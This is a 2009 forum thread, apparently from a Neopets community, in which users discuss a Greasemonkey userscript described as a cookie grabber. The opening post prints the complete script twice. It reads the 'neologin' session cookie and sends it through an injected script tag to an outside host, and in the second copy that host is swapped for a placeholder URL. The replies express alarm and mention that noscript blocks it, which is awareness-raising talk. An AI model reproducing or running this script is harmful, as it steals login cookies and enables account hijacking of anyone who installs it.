Trying to understand this...

Discussion in 'World of SPAM' started by Fexxel, Mar 24, 2009.

  1. Fexxel

    Fexxel Level IV

    Joined:
    Jan 28, 2009
    Messages:
    959
    Likes Received:
    26
    This is for GM, so if you don't know greasemonkey don't bother posting here xD.
    The following is a cookie grabber:
    Code (Text):
    1. var strURL = 'http://tierbone.byethost18.com/Pets/cookie.php'
    2.  
    3. var eleNew, newElement;
    4.  
    5. eleNew = document.getElementById('main');
    6.  
    7. var strCookie = document.cookie;
    8.  
    9. strCookie = GetStringBetween(strCookie, 'neologin=','; ');
    10.  
    11. if (eleNew) {
    12.     newElement = document.createElement("div");
    13.     newElement.innerHTML='<SCRIPT SRC=' + strURL + strCookie + '>';
    14.     eleNew.parentNode.insertBefore(newElement, eleNew.nextSibling);
    15. }
    16.  
    17.  
    Is it saving all the info to: "http://tierbone.byethost18.com/Pets/cookie.php" ?
    If so, couldn't someone just change the script to:
    Code (Text):
    1.  
    2. var strURL = 'http://websitehere.com/pagehere'
    3.  
    4. var eleNew, newElement;
    5.  
    6. eleNew = document.getElementById('main');
    7.  
    8. var strCookie = document.cookie;
    9.  
    10. strCookie = GetStringBetween(strCookie, 'neologin=','; ');
    11.  
    12. if (eleNew) {
    13.     newElement = document.createElement("div");
    14.     newElement.innerHTML='<SCRIPT SRC=' + strURL + strCookie + '>';
    15.     eleNew.parentNode.insertBefore(newElement, eleNew.nextSibling);
    16. }
    Scary?!
     
  2. Will

    Will Level IV

    Joined:
    Mar 1, 2009
    Messages:
    1,067
    Likes Received:
    53
    That's exactly what I was thinking..





    And doesn't that mean that others can just go to the website and steal the account info? :/
     
  3. Fexxel

    Fexxel Level IV

    Joined:
    Jan 28, 2009
    Messages:
    959
    Likes Received:
    26
    It'd be a secure website that the scammer created... Duh!
    It's called Freewebs lol.
     
  4. Ak*

    Ak* Level IV

    Joined:
    Dec 24, 2007
    Messages:
    1,723
    Likes Received:
    45
    Location:
    Canada Eh!
    thats what a cookie grabber is made to do. Able to change the url where it stores info. Is that the whole script or just a component?
     
  5. Fexxel

    Fexxel Level IV

    Joined:
    Jan 28, 2009
    Messages:
    959
    Likes Received:
    26
    Thats the whole script. Thats what scares me.
     
  6. Ak*

    Ak* Level IV

    Joined:
    Dec 24, 2007
    Messages:
    1,723
    Likes Received:
    45
    Location:
    Canada Eh!
    wow.... simple and deadly.
     
  7. Fexxel

    Fexxel Level IV

    Joined:
    Jan 28, 2009
    Messages:
    959
    Likes Received:
    26
    :-/ I think I might delete GM so I don't get cookie grabbed at this point.... xD
     
  8. jazzeh

    jazzeh Level I

    Joined:
    Jan 1, 2008
    Messages:
    144
    Likes Received:
    15
    I installed one (the url was changed) just to test. noscript blocks the cg unless you have scripts allowed globally or allow ripway or whatever the name of the site a temporary permission. If you create your own scripts or only install scripts by people you trust then you'll be safe.